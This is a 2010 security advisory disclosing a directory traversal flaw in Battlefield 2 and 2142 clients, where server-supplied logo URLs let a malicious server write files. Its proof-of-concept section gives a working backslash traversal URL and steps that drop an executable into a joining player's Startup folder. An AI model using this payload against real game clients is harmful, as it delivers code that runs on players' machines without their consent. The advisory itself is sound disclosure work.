####################################################################### Luigi Auriemma Application: Refractor 2 engine Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0) http://www.battlefield.ea.com/battlefield/bf2/ Battlefield 2142 <= 1.50 (aka 1.10.48.0) http://battlefield.ea.com/battlefield/bf2142/ ... other games developed with the same engine could be vulnerable like Battlefield Heroes Platforms: Windows Bug: client URLs directory traversal Exploitation: remote, versus clients Date: 29 Jun 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== The Battlefield series is one of the most famous and played series of games deeply devoted to multiplayer gaming. The series is developed by DICE (http://www.dice.se) and published by Electronic Arts. ####################################################################### ====== 2) Bug ====== Each BF2 and BF2142 server has some fields where the admin can specify the links to files and images like the sponsor and community logo. The sponsor logo is visible immediately when the client gets the list of servers and selects the server with the mouse (one-click, not join) while the second one is loaded when the client joins that server. Exist also other URLs like DemoDownloadURL, DemoIndexURL and CustomMapsURL that can be exploited when the client joins the malicious server. The client performs a very simple operation, it gets the URL and downloads the file saving it locally using its original name in the following folder: C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER where USER is the Windows account of the current user and SERVER is the address of the web server, while LogoCache could be HttpCache if are used the URLs for downloading demos and maps. The vulnerability resides in the missing handling of the backslash char with the consequence that the name of the file will include the classical directory traversal pattern allowing a malicious server to upload malicious executables on the clients. Note that the loading of the URLs is automatic and doesn't seem possible to disable this feature. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/onlywebs.zip - launch: onlywebs.exe c:\malicious_file.exe - start the server launcher using the following string as sponsor and community logo URL: http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe - Save and Start the server - launch the client and go in the multiplayer menu - when the refreshing of the list is terminated select or join the malicious server - now the file owned.exe will be available in the Startup folder of the client and will be executed at the next login or reboot note that the server could be not seen if you are running it on the same machine of the client (127.0.0.1), in that case use another computer/vm (a server or an UDP datapipe on port 29900) ####################################################################### ====== 4) Fix ====== No fix. #######################################################################